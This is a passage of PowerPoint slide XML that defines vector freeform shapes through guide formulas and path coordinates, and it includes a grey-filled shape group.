                  <a:gd name="T69" fmla="*/ 57 h 6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22" h="635">
                    <a:moveTo>
                      <a:pt x="132" y="57"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="153" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="57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0" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4287838" y="1128713"/>
                <a:ext cx="120650" cy="274637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 137 w 337"/>
                  <a:gd name="T1" fmla="*/ 0 h 762"/>
                  <a:gd name="T2" fmla="*/ 169 w 337"/>
                  <a:gd name="T3" fmla="*/ 115 h 762"/>
                  <a:gd name="T4" fmla="*/ 32 w 337"/>
                  <a:gd name="T5" fmla="*/ 152 h 762"/>
                  <a:gd name="T6" fmla="*/ 0 w 337"/>
                  <a:gd name="T7" fmla="*/ 36 h 762"/>
                  <a:gd name="T8" fmla="*/ 137 w 337"/>
                  <a:gd name="T9" fmla="*/ 0 h 762"/>
                  <a:gd name="T10" fmla="*/ 189 w 337"/>
                  <a:gd name="T11" fmla="*/ 183 h 762"/>
                  <a:gd name="T12" fmla="*/ 336 w 337"/>
                  <a:gd name="T13" fmla="*/ 724 h 762"/>
                  <a:gd name="T14" fmla="*/ 195 w 337"/>
                  <a:gd name="T15" fmla="*/ 761 h 762"/>
                  <a:gd name="T16" fmla="*/ 48 w 337"/>
                  <a:gd name="T17" fmla="*/ 220 h 762"/>
                  <a:gd name="T18" fmla="*/ 189 w 337"/>
                  <a:gd name="T19" fmla="*/ 183 h 7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37" h="762">
                    <a:moveTo>
                      <a:pt x="137" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="169" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="189" y="183"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="336" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="183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1" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4383088" y="1114425"/>
                <a:ext cx="149225" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 415"/>
                  <a:gd name="T1" fmla="*/ 0 h 715"/>
                  <a:gd name="T2" fmla="*/ 210 w 415"/>
                  <a:gd name="T3" fmla="*/ 157 h 715"/>
                  <a:gd name="T4" fmla="*/ 289 w 415"/>
                  <a:gd name="T5" fmla="*/ 136 h 715"/>
                  <a:gd name="T6" fmla="*/ 310 w 415"/>
                  <a:gd name="T7" fmla="*/ 231 h 715"/>
                  <a:gd name="T8" fmla="*/ 231 w 415"/>
                  <a:gd name="T9" fmla="*/ 252 h 715"/>
                  <a:gd name="T10" fmla="*/ 299 w 415"/>
                  <a:gd name="T11" fmla="*/ 546 h 715"/>
                  <a:gd name="T12" fmla="*/ 299 w 415"/>
                  <a:gd name="T13" fmla="*/ 546 h 715"/>
                  <a:gd name="T14" fmla="*/ 310 w 415"/>
                  <a:gd name="T15" fmla="*/ 572 h 715"/>
                  <a:gd name="T16" fmla="*/ 320 w 415"/>
                  <a:gd name="T17" fmla="*/ 588 h 715"/>
                  <a:gd name="T18" fmla="*/ 320 w 415"/>
                  <a:gd name="T19" fmla="*/ 588 h 715"/>
                  <a:gd name="T20" fmla="*/ 336 w 415"/>
                  <a:gd name="T21" fmla="*/ 598 h 715"/>
                  <a:gd name="T22" fmla="*/ 362 w 415"/>
                  <a:gd name="T23" fmla="*/ 593 h 715"/>
                  <a:gd name="T24" fmla="*/ 362 w 415"/>
                  <a:gd name="T25" fmla="*/ 593 h 715"/>
                  <a:gd name="T26" fmla="*/ 378 w 415"/>
                  <a:gd name="T27" fmla="*/ 588 h 715"/>
                  <a:gd name="T28" fmla="*/ 378 w 415"/>
                  <a:gd name="T29" fmla="*/ 588 h 715"/>
                  <a:gd name="T30" fmla="*/ 394 w 415"/>
                  <a:gd name="T31" fmla="*/ 582 h 715"/>
                  <a:gd name="T32" fmla="*/ 414 w 415"/>
                  <a:gd name="T33" fmla="*/ 682 h 715"/>
                  <a:gd name="T34" fmla="*/ 414 w 415"/>
                  <a:gd name="T35" fmla="*/ 682 h 715"/>
                  <a:gd name="T36" fmla="*/ 373 w 415"/>
                  <a:gd name="T37" fmla="*/ 693 h 715"/>
                  <a:gd name="T38" fmla="*/ 373 w 415"/>
                  <a:gd name="T39" fmla="*/ 693 h 715"/>
                  <a:gd name="T40" fmla="*/ 325 w 415"/>
                  <a:gd name="T41" fmla="*/ 703 h 715"/>
                  <a:gd name="T42" fmla="*/ 325 w 415"/>
                  <a:gd name="T43" fmla="*/ 703 h 715"/>
                  <a:gd name="T44" fmla="*/ 289 w 415"/>
                  <a:gd name="T45" fmla="*/ 714 h 715"/>
                  <a:gd name="T46" fmla="*/ 257 w 415"/>
                  <a:gd name="T47" fmla="*/ 714 h 715"/>
                  <a:gd name="T48" fmla="*/ 257 w 415"/>
                  <a:gd name="T49" fmla="*/ 714 h 715"/>
                  <a:gd name="T50" fmla="*/ 231 w 415"/>
                  <a:gd name="T51" fmla="*/ 714 h 715"/>
                  <a:gd name="T52" fmla="*/ 215 w 415"/>
                  <a:gd name="T53" fmla="*/ 703 h 715"/>
                  <a:gd name="T54" fmla="*/ 215 w 415"/>
                  <a:gd name="T55" fmla="*/ 703 h 715"/>
                  <a:gd name="T56" fmla="*/ 200 w 415"/>
                  <a:gd name="T57" fmla="*/ 688 h 715"/>
                  <a:gd name="T58" fmla="*/ 184 w 415"/>
                  <a:gd name="T59" fmla="*/ 661 h 715"/>
                  <a:gd name="T60" fmla="*/ 184 w 415"/>
                  <a:gd name="T61" fmla="*/ 661 h 715"/>
                  <a:gd name="T62" fmla="*/ 163 w 415"/>
                  <a:gd name="T63" fmla="*/ 593 h 715"/>
                  <a:gd name="T64" fmla="*/ 90 w 415"/>
                  <a:gd name="T65" fmla="*/ 283 h 715"/>
                  <a:gd name="T66" fmla="*/ 21 w 415"/>
                  <a:gd name="T67" fmla="*/ 299 h 715"/>
                  <a:gd name="T68" fmla="*/ 0 w 415"/>
                  <a:gd name="T69" fmla="*/ 204 h 715"/>
                  <a:gd name="T70" fmla="*/ 68 w 415"/>
                  <a:gd name="T71" fmla="*/ 189 h 715"/>
                  <a:gd name="T72" fmla="*/ 31 w 415"/>
                  <a:gd name="T73" fmla="*/ 31 h 715"/>
                  <a:gd name="T74" fmla="*/ 173 w 415"/>
                  <a:gd name="T75" fmla="*/ 0 h 7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15" h="715">
                    <a:moveTo>
                      <a:pt x="173" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173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2" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4500563" y="1131888"/>
                <a:ext cx="161925" cy="287337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 448"/>
                  <a:gd name="T1" fmla="*/ 688 h 799"/>
                  <a:gd name="T2" fmla="*/ 189 w 448"/>
                  <a:gd name="T3" fmla="*/ 688 h 799"/>
                  <a:gd name="T4" fmla="*/ 221 w 448"/>
                  <a:gd name="T5" fmla="*/ 677 h 799"/>
                  <a:gd name="T6" fmla="*/ 232 w 448"/>
                  <a:gd name="T7" fmla="*/ 667 h 799"/>
                  <a:gd name="T8" fmla="*/ 236 w 448"/>
                  <a:gd name="T9" fmla="*/ 656 h 799"/>
                  <a:gd name="T10" fmla="*/ 236 w 448"/>
                  <a:gd name="T11" fmla="*/ 656 h 799"/>
                  <a:gd name="T12" fmla="*/ 247 w 448"/>
                  <a:gd name="T13" fmla="*/ 630 h 799"/>
                  <a:gd name="T14" fmla="*/ 247 w 448"/>
                  <a:gd name="T15" fmla="*/ 599 h 799"/>
                  <a:gd name="T16" fmla="*/ 0 w 448"/>
                  <a:gd name="T17" fmla="*/ 74 h 799"/>
                  <a:gd name="T18" fmla="*/ 147 w 448"/>
                  <a:gd name="T19" fmla="*/ 48 h 799"/>
                  <a:gd name="T20" fmla="*/ 294 w 448"/>
                  <a:gd name="T21" fmla="*/ 415 h 799"/>
                  <a:gd name="T22" fmla="*/ 300 w 448"/>
                  <a:gd name="T23" fmla="*/ 415 h 799"/>
                  <a:gd name="T24" fmla="*/ 305 w 448"/>
                  <a:gd name="T25" fmla="*/ 21 h 799"/>
                  <a:gd name="T26" fmla="*/ 447 w 448"/>
                  <a:gd name="T27" fmla="*/ 0 h 799"/>
                  <a:gd name="T28" fmla="*/ 400 w 448"/>
                  <a:gd name="T29" fmla="*/ 536 h 799"/>
                  <a:gd name="T30" fmla="*/ 400 w 448"/>
                  <a:gd name="T31" fmla="*/ 536 h 799"/>
                  <a:gd name="T32" fmla="*/ 394 w 448"/>
                  <a:gd name="T33" fmla="*/ 599 h 799"/>
                  <a:gd name="T34" fmla="*/ 383 w 448"/>
                  <a:gd name="T35" fmla="*/ 651 h 799"/>
                  <a:gd name="T36" fmla="*/ 383 w 448"/>
                  <a:gd name="T37" fmla="*/ 651 h 799"/>
                  <a:gd name="T38" fmla="*/ 373 w 448"/>
                  <a:gd name="T39" fmla="*/ 693 h 799"/>
                  <a:gd name="T40" fmla="*/ 357 w 448"/>
                  <a:gd name="T41" fmla="*/ 725 h 799"/>
                  <a:gd name="T42" fmla="*/ 357 w 448"/>
                  <a:gd name="T43" fmla="*/ 725 h 799"/>
                  <a:gd name="T44" fmla="*/ 331 w 448"/>
                  <a:gd name="T45" fmla="*/ 751 h 799"/>
                  <a:gd name="T46" fmla="*/ 305 w 448"/>
                  <a:gd name="T47" fmla="*/ 767 h 799"/>
                  <a:gd name="T48" fmla="*/ 305 w 448"/>
                  <a:gd name="T49" fmla="*/ 767 h 799"/>
                  <a:gd name="T50" fmla="*/ 268 w 448"/>
                  <a:gd name="T51" fmla="*/ 777 h 799"/>
                  <a:gd name="T52" fmla="*/ 226 w 448"/>
                  <a:gd name="T53" fmla="*/ 788 h 799"/>
                  <a:gd name="T54" fmla="*/ 169 w 448"/>
                  <a:gd name="T55" fmla="*/ 798 h 799"/>
                  <a:gd name="T56" fmla="*/ 147 w 448"/>
                  <a:gd name="T57" fmla="*/ 693 h 799"/>
                  <a:gd name="T58" fmla="*/ 147 w 448"/>
                  <a:gd name="T59" fmla="*/ 693 h 799"/>
                  <a:gd name="T60" fmla="*/ 189 w 448"/>
                  <a:gd name="T61" fmla="*/ 688 h 7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48" h="799">
                    <a:moveTo>
                      <a:pt x="189" y="688"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="688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65" name="Group 164"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4946205" y="2053675"/>
              <a:ext cx="856684" cy="995060"/>
              <a:chOff x="5754688" y="1204913"/>
              <a:chExt cx="1955800" cy="2271712"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="228" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5754688" y="1204913"/>
                <a:ext cx="222250" cy="284162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 616"/>
                  <a:gd name="T1" fmla="*/ 640 h 788"/>
                  <a:gd name="T2" fmla="*/ 43 w 616"/>
                  <a:gd name="T3" fmla="*/ 556 h 788"/>
                  <a:gd name="T4" fmla="*/ 69 w 616"/>
                  <a:gd name="T5" fmla="*/ 520 h 788"/>
                  <a:gd name="T6" fmla="*/ 95 w 616"/>
                  <a:gd name="T7" fmla="*/ 488 h 788"/>
                  <a:gd name="T8" fmla="*/ 168 w 616"/>
                  <a:gd name="T9" fmla="*/ 436 h 788"/>
                  <a:gd name="T10" fmla="*/ 211 w 616"/>
                  <a:gd name="T11" fmla="*/ 409 h 788"/>
                  <a:gd name="T12" fmla="*/ 337 w 616"/>
                  <a:gd name="T13" fmla="*/ 352 h 788"/>
                  <a:gd name="T14" fmla="*/ 389 w 616"/>
                  <a:gd name="T15" fmla="*/ 330 h 788"/>
                  <a:gd name="T16" fmla="*/ 421 w 616"/>
                  <a:gd name="T17" fmla="*/ 299 h 788"/>
                  <a:gd name="T18" fmla="*/ 436 w 616"/>
                  <a:gd name="T19" fmla="*/ 283 h 788"/>
                  <a:gd name="T20" fmla="*/ 447 w 616"/>
                  <a:gd name="T21" fmla="*/ 267 h 788"/>
                  <a:gd name="T22" fmla="*/ 462 w 616"/>
                  <a:gd name="T23" fmla="*/ 220 h 788"/>
                  <a:gd name="T24" fmla="*/ 473 w 616"/>
                  <a:gd name="T25" fmla="*/ 163 h 788"/>
                  <a:gd name="T26" fmla="*/ 462 w 616"/>
                  <a:gd name="T27" fmla="*/ 136 h 788"/>
                  <a:gd name="T28" fmla="*/ 441 w 616"/>
                  <a:gd name="T29" fmla="*/ 115 h 788"/>
                  <a:gd name="T30" fmla="*/ 426 w 616"/>
                  <a:gd name="T31" fmla="*/ 110 h 788"/>
                  <a:gd name="T32" fmla="*/ 378 w 616"/>
                  <a:gd name="T33" fmla="*/ 105 h 788"/>
                  <a:gd name="T34" fmla="*/ 363 w 616"/>
                  <a:gd name="T35" fmla="*/ 115 h 788"/>
                  <a:gd name="T36" fmla="*/ 347 w 616"/>
                  <a:gd name="T37" fmla="*/ 126 h 788"/>
                  <a:gd name="T38" fmla="*/ 321 w 616"/>
                  <a:gd name="T39" fmla="*/ 168 h 788"/>
                  <a:gd name="T40" fmla="*/ 300 w 616"/>
                  <a:gd name="T41" fmla="*/ 220 h 788"/>
                  <a:gd name="T42" fmla="*/ 174 w 616"/>
                  <a:gd name="T43" fmla="*/ 147 h 788"/>
                  <a:gd name="T44" fmla="*/ 190 w 616"/>
                  <a:gd name="T45" fmla="*/ 99 h 788"/>
                  <a:gd name="T46" fmla="*/ 242 w 616"/>
                  <a:gd name="T47" fmla="*/ 36 h 788"/>
                  <a:gd name="T48" fmla="*/ 279 w 616"/>
                  <a:gd name="T49" fmla="*/ 16 h 788"/>
                  <a:gd name="T50" fmla="*/ 357 w 616"/>
                  <a:gd name="T51" fmla="*/ 0 h 788"/>
                  <a:gd name="T52" fmla="*/ 457 w 616"/>
                  <a:gd name="T53" fmla="*/ 16 h 788"/>
                  <a:gd name="T54" fmla="*/ 504 w 616"/>
                  <a:gd name="T55" fmla="*/ 36 h 788"/>
                  <a:gd name="T56" fmla="*/ 578 w 616"/>
                  <a:gd name="T57" fmla="*/ 89 h 788"/>
                  <a:gd name="T58" fmla="*/ 599 w 616"/>
                  <a:gd name="T59" fmla="*/ 120 h 788"/>
                  <a:gd name="T60" fmla="*/ 615 w 616"/>
                  <a:gd name="T61" fmla="*/ 194 h 788"/>
                  <a:gd name="T62" fmla="*/ 599 w 616"/>
                  <a:gd name="T63" fmla="*/ 278 h 788"/>
                  <a:gd name="T64" fmla="*/ 588 w 616"/>
                  <a:gd name="T65" fmla="*/ 309 h 788"/>
                  <a:gd name="T66" fmla="*/ 573 w 616"/>
                  <a:gd name="T67" fmla="*/ 341 h 788"/>
                  <a:gd name="T68" fmla="*/ 536 w 616"/>
                  <a:gd name="T69" fmla="*/ 388 h 788"/>
                  <a:gd name="T70" fmla="*/ 515 w 616"/>
                  <a:gd name="T71" fmla="*/ 409 h 788"/>
                  <a:gd name="T72" fmla="*/ 484 w 616"/>
                  <a:gd name="T73" fmla="*/ 430 h 788"/>
                  <a:gd name="T74" fmla="*/ 315 w 616"/>
                  <a:gd name="T75" fmla="*/ 509 h 788"/>
                  <a:gd name="T76" fmla="*/ 274 w 616"/>
                  <a:gd name="T77" fmla="*/ 530 h 788"/>
                  <a:gd name="T78" fmla="*/ 247 w 616"/>
                  <a:gd name="T79" fmla="*/ 546 h 788"/>
                  <a:gd name="T80" fmla="*/ 205 w 616"/>
                  <a:gd name="T81" fmla="*/ 588 h 788"/>
                  <a:gd name="T82" fmla="*/ 431 w 616"/>
                  <a:gd name="T83" fmla="*/ 787 h 7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616" h="788">
                    <a:moveTo>
                      <a:pt x="0" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
